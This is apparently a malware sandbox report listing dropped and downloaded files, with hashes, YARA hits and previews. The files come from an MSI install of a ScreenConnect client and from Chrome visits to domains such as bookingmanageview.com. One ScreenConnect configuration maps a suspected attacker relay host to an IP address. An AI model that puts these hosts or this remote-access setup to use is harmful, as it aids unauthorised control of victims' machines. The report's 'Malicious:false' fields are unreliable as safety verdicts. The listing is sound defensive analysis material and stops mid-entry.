                                                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7388
                                                                                                                          Entropy (8bit):3.243751351469083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:87A875D6E02C7CC2F22C92DB296D9D71
                                                                                                                          SHA1:8F5B5514104DE262FCA53D76A3C3A719AD9E5394
                                                                                                                          SHA-256:3E39AEAD8B782C9FDD88EA80125F97B4E71C71AF3255AB4257E4FB19F691881E
                                                                                                                          SHA-512:E92BCD4E2A48E615EAE314A1AE3C1B44279E5A0591D9666571B601B065B7E95F94BDEC78E49717C67C1808220656DB3E977A88321DCFCC6358898816A1CE37F0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.6. .. 2.0.2.3. .1.1.:.3.5.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                          Process:C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):566
                                                                                                                          Entropy (8bit):5.056013404488193
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:89A844128ABE2D072A16665555D1F365
                                                                                                                          SHA1:1217E1B685D733EB4AD0C1EB023426FF682608FB
                                                                                                                          SHA-256:4B2CE3FE3814F007F51E4F59858E4D897DE950E9F072CFE4CBD3B86248E5F730
                                                                                                                          SHA-512:980BF9CBA61888F3DE8ED49D79302C373A7704065DF7BAA46ED831DEC3FE4BF06664B64E511EF1ECF7AC350CF7061A1C28FB73AEF9E32C1972FC0D2FCA96489E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>bookinghqsupport.top=199.127.62.110-07%2f03%2f2025%2022%3a33%3a57</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                          Process:C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):0
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:89A844128ABE2D072A16665555D1F365
                                                                                                                          SHA1:1217E1B685D733EB4AD0C1EB023426FF682608FB
                                                                                                                          SHA-256:4B2CE3FE3814F007F51E4F59858E4D897DE950E9F072CFE4CBD3B86248E5F730
                                                                                                                          SHA-512:980BF9CBA61888F3DE8ED49D79302C373A7704065DF7BAA46ED831DEC3FE4BF06664B64E511EF1ECF7AC350CF7061A1C28FB73AEF9E32C1972FC0D2FCA96489E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>bookinghqsupport.top=199.127.62.110-07%2f03%2f2025%2022%3a33%3a57</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):512
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):0.07762588309624781
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:6B14CB86A39DECC29CD0D2CF9CE37548
                                                                                                                          SHA1:30FC5993F22257D80A9FB8B21FF40F002519FFBD
                                                                                                                          SHA-256:DE5C1E84B2337C6BA238782F5BFC2278407CDA43CC127BB1BA246A3C3035F88E
                                                                                                                          SHA-512:09E3949DB5593C220201559C018D892548BE35384691525D79AAA4D87D6999CAFF8FC82F341D33E043DEDA318A592A1092F9D958276B95A6F4D8714ECA6A1598
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69632
                                                                                                                          Entropy (8bit):0.23929088127443526
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:D5037876B9B3752AA855A1893C780CE7
                                                                                                                          SHA1:546F4AC74D290887B24C04FD9F3127434CF63F6A
                                                                                                                          SHA-256:981043593AEE5EC7D6D625EED0CDAFEE04A8236A68D256D1EFB70F4099103AE8
                                                                                                                          SHA-512:1D1029CA746C433B23139443AFF69962178CDC36637E48843DA48811419AFE85BA9FE2EA1950588E86E430A2A9E6B22A8A3BF597227BEA4C65BAFD5533E6075C
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFCA3227996840FADD.TMP, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):1.4300001970237424
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:A5247CC0C325E9814CAA82FFD391804F
                                                                                                                          SHA1:4F7469577F01C897E2CEA94CE929DF1EA2127FE3
                                                                                                                          SHA-256:EA6867771693785D6DEC7F8B9D20E0CE8D33B34A0B4523FFBADF4678C7CA887E
                                                                                                                          SHA-512:7CA9DCBFF75073F8389126804E4E6F1266376A25BCD09D872DEF5B13FB37119529D92A17ABBB97D5DA13847DB09C4607884094C5C76C3F272953934A2FEC8173
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFD365F17729FDCDF2.TMP, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (12918)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):13482
                                                                                                                          Entropy (8bit):5.2784390907629355
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:D3070794E13DC3BBC8A51FB870386CE6
                                                                                                                          SHA1:80333DAD87995542B9F206809750D477C67E65AC
                                                                                                                          SHA-256:C9CB4D926CBE04BE8365B7A2B9F808AAAA2F38C6F88181FC2B92BD87DD21D758
                                                                                                                          SHA-512:54ADC554E2C2562B8F34466650DD7B712C30AE1A3A34BC229CE96501C3F3ED93A76327C9B31BC8195565228BA84F8E26358955DB4F620507B10FA2BB0030DE28
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://syndicatedsearch.goog/afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=00001&domain_name=oceanbreeze.com&client=dp-namemedia01&r=m&rpbu=https%3A%2F%2Foceanbreeze.com%2Flander&type=3&uiopt=true&swp=as-drid-oo-1502969727449347&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301437%2C17301439%2C17301442%2C17301548%2C17301266%2C72717107&format=r3&nocache=9381741386831140&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=2&u_tz=-300&dt=1741386831142&u_w=1280&u_h=1024&biw=1280&bih=897&psw=1280&psh=897&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=732930958&rurl=https%3A%2F%2Foceanbreeze.com%2Flander&referer=http%3A%2F%2Foceanbreeze.com%2F
                                                                                                                          Preview:<!doctype html><html lang="en"> <head> <style id="ssr-boilerplate">body{-webkit-text-size-adjust:100%; font-family:arial,sans-serif; margin:0;}.div{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;max-width:100%;}.span:last-child, .div:last-child{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.a{text-decoration:none; text-transform:none; color:inherit; display:inline-block;}.span{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;display:inline-block; overflow:hidden; text-transform:none;}.img{border:none; max-width:100%; max-height:100%;}.i_{display:-ms-flexbox; display:-webkit-box; display:-webkit-flex; display:flex;-ms-flex-align:start; -webkit-box-align:start; -webkit-align-items:flex-start; align-items:flex-start;box-sizing:border-box; overflow:hidden;}.v_{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.j_>span:last-child, .j_>div:last-child, .w_, .w_:last-child{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;}.l_{-ms-overflow
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):200
                                                                                                                          Entropy (8bit):5.032268383518208
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:CDA1EC3580305080544D05765D14B5D5
                                                                                                                          SHA1:49E3B7057B2A02843876BD4BA2D12629C53766C5
                                                                                                                          SHA-256:81C042CDE00D76A79AEB2C402BF93BD34E31B3A0061D484519052E094686C75D
                                                                                                                          SHA-512:FFEC368162234B6BBEF9791AA24013D256EB8660EDE3AB5A30225F91B6948710BA20A28C16213841494AEE550BE3B0095F8EF4A9F61B749EA61112C17CC5300B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5094
                                                                                                                          Entropy (8bit):4.834039771497343
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:A8FEAF8EA80C17228A67DFEB1E251D8F
                                                                                                                          SHA1:38A4598BA356C8E43E6A6EA2E59587AB76D26A05
                                                                                                                          SHA-256:35F933EFDC4AC3426775ABF70B002C39D5A9D98B343A11E44A21EB3D0C952FD3
                                                                                                                          SHA-512:0E969BAB0E5338E0EEC990D39A01D13BB88A687EF4986FC1407C2416014179A4D15BDD61074441014487E4E978D1025FE9B6A1D16BFDE3CD706B0F6073C6C094
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg xmlns="http://www.w3.org/2000/svg" width="75.320129mm" height="92.604164mm" viewBox="0 0 75.320129 92.604164">. <g transform="translate(53.548057 -183.975276) scale(1.4843)">. <path fill="#ff2116" d="M-29.632812 123.94727c-3.551967 0-6.44336 2.89347-6.44336 6.44531v49.49804c0 3.55185 2.891393 6.44532 6.44336 6.44532H8.2167969c3.5519661 0 6.4433591-2.89335 6.4433591-6.44532v-40.70117s.101353-1.19181-.416015-2.35156c-.484969-1.08711-1.275391-1.84375-1.275391-1.84375a1.0584391 1.0584391 0 0 0-.0059-.008l-9.3906254-9.21094a1.0584391 1.0584391 0 0 0-.015625-.0156s-.8017392-.76344-1.9902344-1.27344c-1.39939552-.6005-2.8417968-.53711-2.8417968-.53711l.021484-.002z" color="#000" font-family="sans-serif" overflow="visible" paint-order="markers fill stroke" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feat
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):4021
                                                                                                                          Entropy (8bit):7.935074540109196
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:7ADF67E30A494611ABF7C19503303F7E
                                                                                                                          SHA1:2C4D0B6B143DF7165E50D35E629C8854830597DC
                                                                                                                          SHA-256:D3EF04CF96B162CB6B94CC1E27FABC784555F85B16BD9086D6D0236423D2728B
                                                                                                                          SHA-512:5E7C756097CCD3F6BFE50FAA87606DABDB829CE4E96C24B22B428BC5EFDEC21B2F2220FA3AF9CE0AFA0994B285BD1D9549330E1A1A039DEA710124DF61DAC63B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://bookingmanageview.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/f3b948d8acb8/main.js?
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), truncated
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):20
                                                                                                                          Entropy (8bit):1.1219280948873622
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:3970E82605C7D109BB348FC94E9EECC0
                                                                                                                          SHA1:E03849EA786B9F7B28A35C17949E85A93EB1CFF1
                                                                                                                          SHA-256:F5D031AF01F137AE07FA71720FAB94D16CC8A2A59868766002918B7C240F3967
                                                                                                                          SHA-512:59C8107C5A9678CD4B6BD1D194AC0987CE0D0542CEEECE8430452C238375AA49F0CEA3646935315EA994D8AB05E56AF112157122BE8272185830093FD5922B67
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://img1.wsimg.com/parking-lander/px.js?ch=1&abp=1&gdabp=true
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 239061
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):39412
                                                                                                                          Entropy (8bit):7.992070761371293
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:
                                                                                                                          MD5:44AC81BEB1B9FE9A368F4F25A8A87C62
                                                                                                                          SHA1:D2A4E4A8A5514230672545DD8C360CE220A084CF
                                                                                                                          SHA-256:4DB7B11D5CCA4109E266E1D55FBC6F5F8F23F01A18E4EEDADC51F3E9AC031A8E
                                                                                                                          SHA-512:E6D1B93BF814418671443BAA68F7FCC0FD8E784B5EF302AB9EFA4D5EBE1955E6D28A5E3F235647C0484E022CCE86BB0B59A0D3D565D735A2630E38765DE90573
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://img1.wsimg.com/parking-lander/static/css/main.637d6c71.css
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1333528
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):342759
                                                                                                                          Entropy (8bit):7.998805207290229
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:
                                                                                                                          MD5:BA545214590B4BEE253E327A526DD39E
                                                                                                                          SHA1:A6F45BCF7EC2EE097AFAC6F626B929D4DA9FA691
                                                                                                                          SHA-256:9AA7CF6FDCDCC7631024941AFEF1D9728F453CEBE0A0A56F58E44532720F80EB
                                                                                                                          SHA-512:BE14C642B4ED2A373B1CE5BA92418DCE2C259BEC1ADF52C4FC6EA808AC0A62A32D7E7DF5F18C089FB7D823FB5CC1ACB6FD4887CB6D84717B9961F8E670CE95E0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://img1.wsimg.com/parking-lander/static/js/main.f335a838.js
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):114
                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:http://oceanbreeze.com/
                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):29
                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:6FED308183D5DFC421602548615204AF
                                                                                                                          SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                          SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                          SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                          Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1967)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):144880
                                                                                                                          Entropy (8bit):5.535056612330804
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:2E9D5181232EA49118A5D6818FA56690
                                                                                                                          SHA1:84FED667D93A18C1A61CF78CA51BF41D8106A09E
                                                                                                                          SHA-256:597ABB69114DFA2BFB1EDA368C198F1C1F7C16B9540087AB2E7D54AE742C3AC1
                                                                                                                          SHA-512:7ADBC33A7D9FA545B805D1C900CCB017597309371F199ECB6F8783B5F542A2EE4DAAE46B1FC6F59F9FE7854C39F38953E6C24FB97E7B139B6652D6E22701559F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true
                                                                                                                          Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"12128785251572431184",packages:"domains",module:"ads",version:"1",m:{cei:"17301437,17301439,17301442,17301548,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog",cdem:{"afs_aa_baseline":500,"afs_gpp_api":0,"disable_usp_api":50,"heterodyne_test":851,"ifr_unif":10,"ivt_changes":0,"rs_tcf":0}}}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (535)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):536
                                                                                                                          Entropy (8bit):5.0823168879814675
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:74EE877D4098C1A5EFA16897412D6F62
                                                                                                                          SHA1:1142D63FBDE49B92F1BE8B33931F854433534D48
                                                                                                                          SHA-256:00BBD783E2163CEA47BA96FE8DADC4340C280C4949248594A5EDCB5FCBD94AC4
                                                                                                                          SHA-512:796579A6A75E894B37EC8A7CE13595DF9B0C44A7B30B20997F07BE507EAA10E6B38171E682306641D52F7EFFA54FAEB4D77C91CEA90B824BCF2970E4ED75F7F7
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://oceanbreeze.com/lander
                                                                                                                          Preview:<!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true"></script><script>window.LANDER_SYSTEM="CP"</script><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/main.f335a838.js"></script><link href="https://img1.wsimg.com/parking-lander/static/css/main.637d6c71.css" rel="stylesheet"></head><body><div id="root"></div></body></html>.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):201253
                                                                                                                          Entropy (8bit):2.661810841903416
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:85DE642E1467807F64F7E10807DF3869
                                                                                                                          SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                                                                                          SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
                                                                                                                          SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage
                                                                                                                          Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):391
                                                                                                                          Entropy (8bit):4.729520059969888
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:1DD79DF28A7517F4F8688A66EDFB04FC
                                                                                                                          SHA1:4AA1200E3E4B50AEB64774E6667DDE9422658C38
                                                                                                                          SHA-256:5FC5D398706CE2D79CA71EAB32AB611D4511260B2D87B9D6D74A8EF59F9BEA8F
                                                                                                                          SHA-512:70CD8282458482ED3F123C0E61C81D1C257C2D4AF12D51674BDF46C748B576CC92CC364CB7DC49D1D7E6D5A4C11AD85AA8E798692414468F0F4531DF95ECF326
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/><path d="M0 0h24v24H0z" fill="none"/></svg>.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5776
                                                                                                                          Entropy (8bit):7.938806206665634
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:D02BD7C8CA90CCD869B635361BC2AACE
                                                                                                                          SHA1:37BAE53EF3CF29882B83378BF44BA4610073817D
                                                                                                                          SHA-256:BEB03CE9C8F23B7D7D5F0B3CC17A3CA68F427FBFB8B1428105F33F348A7854C2
                                                                                                                          SHA-512:F3CD2937259AE6CDFEDDA64D0DEE9D96BCD2495D635242AF8DA16FF3585A3EFDBC3011E9DDD44D25E5D7F4737E7AAAFAAE3414BBC1DCAD1CDEF44FF16AE294DB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):132139
                                                                                                                          Entropy (8bit):5.436500260765363
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
